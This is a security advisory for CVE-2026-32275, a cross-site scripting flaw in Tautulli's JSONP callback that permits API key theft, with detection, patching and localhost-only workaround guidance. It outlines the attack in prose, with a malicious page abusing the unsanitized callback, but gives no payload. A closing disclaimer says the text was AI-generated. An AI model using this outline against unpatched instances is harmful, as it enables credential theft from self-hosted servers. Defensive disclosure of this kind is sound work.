CVE-2026-32275 Overview
CVE-2026-32275 is a Cross-Site Scripting (XSS) vulnerability affecting Tautulli, a Python-based monitoring and tracking tool for Plex Media Server. The vulnerability exists in versions 1.3.10 through 2.16.x due to an unsanitized JSONP callback parameter that allows cross-origin script injection and API key theft.
Critical Impact
Attackers can exploit the unsanitized JSONP callback parameter to inject malicious scripts and steal API keys, potentially gaining unauthorized access to Plex Media Server monitoring data and administrative functions.
Affected Products
- Tautulli versions 1.3.10 to before 2.17.0
- Plex Media Server environments using vulnerable Tautulli installations
- Self-hosted Tautulli deployments with network-exposed interfaces
Discovery Timeline
- 2026-03-30 - CVE-2026-32275 published to NVD
- 2026-04-02 - Last updated in NVD database
Technical Details for CVE-2026-32275
Vulnerability Analysis
This vulnerability stems from improper input validation in the JSONP callback handling mechanism within Tautulli. JSONP (JSON with Padding) is a technique used to bypass same-origin policy restrictions by wrapping JSON responses in a callback function. When the callback parameter is not properly sanitized, attackers can inject arbitrary JavaScript code that executes in the context of the victim's browser session.
The attack requires user interaction, as victims must be lured to a malicious page that makes cross-origin requests to the vulnerable Tautulli instance. Once triggered, the injected script can exfiltrate sensitive data including API keys, session tokens, and Plex server configuration details.
Root Cause
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), commonly known as Cross-Site Scripting. The JSONP endpoint fails to validate or sanitize the callback parameter before including it in the response, allowing arbitrary JavaScript function names or code fragments to be reflected back to the client.
Attack Vector
The attack vector is network-based and requires user interaction. An attacker crafts a malicious web page containing a script tag that points to the vulnerable Tautulli JSONP endpoint with a crafted callback parameter. When a victim with an active Tautulli session visits the malicious page, the injected script executes with access to the Tautulli domain's context, enabling API key theft and other malicious actions.
The vulnerability mechanism involves manipulating the callback parameter to break out of the expected function call context and inject additional JavaScript statements. For detailed technical information, refer to the GitHub Security Advisory GHSA-95mg-wpqw-9qxh.
Detection Methods for CVE-2026-32275
Indicators of Compromise
- Unusual outbound requests from Tautulli to unknown external domains
- API key usage from unfamiliar IP addresses or geographic locations
- Unexpected JSONP requests with suspicious callback parameter values containing special characters or JavaScript syntax
- Web server logs showing requests to JSONP endpoints with encoded script payloads
Detection Strategies
- Monitor web server access logs for JSONP endpoint requests with callback parameters containing characters like <, >, (, ), or encoded variants
- Implement Content Security Policy (CSP) headers to detect and block inline script execution attempts
- Deploy web application firewall (WAF) rules to identify XSS payload patterns in callback parameters
- Review browser console errors on client-side for unexpected script execution attempts
Monitoring Recommendations
- Enable verbose logging for Tautulli API endpoints and review for anomalous patterns
- Set up alerts for API key rotation events or unexpected API authentication changes
- Monitor network traffic for data exfiltration attempts to untrusted external endpoints
- Implement rate limiting on JSONP endpoints to detect automated exploitation attempts
How to Mitigate CVE-2026-32275
Immediate Actions Required
- Upgrade Tautulli to version 2.17.0 or later immediately
- Rotate any API keys that may have been exposed while running vulnerable versions
- Review access logs for evidence of exploitation attempts
- Restrict network access to Tautulli interfaces to trusted networks only
Patch Information
Tautulli has addressed this vulnerability in version 2.17.0. The fix implements proper sanitization of the JSONP callback parameter to prevent script injection. Users should update immediately by downloading the latest release from the Tautulli Release v2.17.0 page or using their package manager's update mechanism.
For additional details about this security issue, consult the GitHub Security Advisory GHSA-95mg-wpqw-9qxh.
Workarounds
- Place Tautulli behind a reverse proxy that strips or validates JSONP callback parameters
- Restrict access to Tautulli to localhost only and use SSH tunneling for remote access
- Implement network-level access controls to limit which clients can reach the Tautulli web interface
- Disable JSONP functionality if not required for your deployment (may require custom configuration)
# Example: Restrict Tautulli access to localhost only in config.ini
[General]
http_host = 127.0.0.1
http_port = 8181
# Use SSH tunnel or VPN for remote access
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
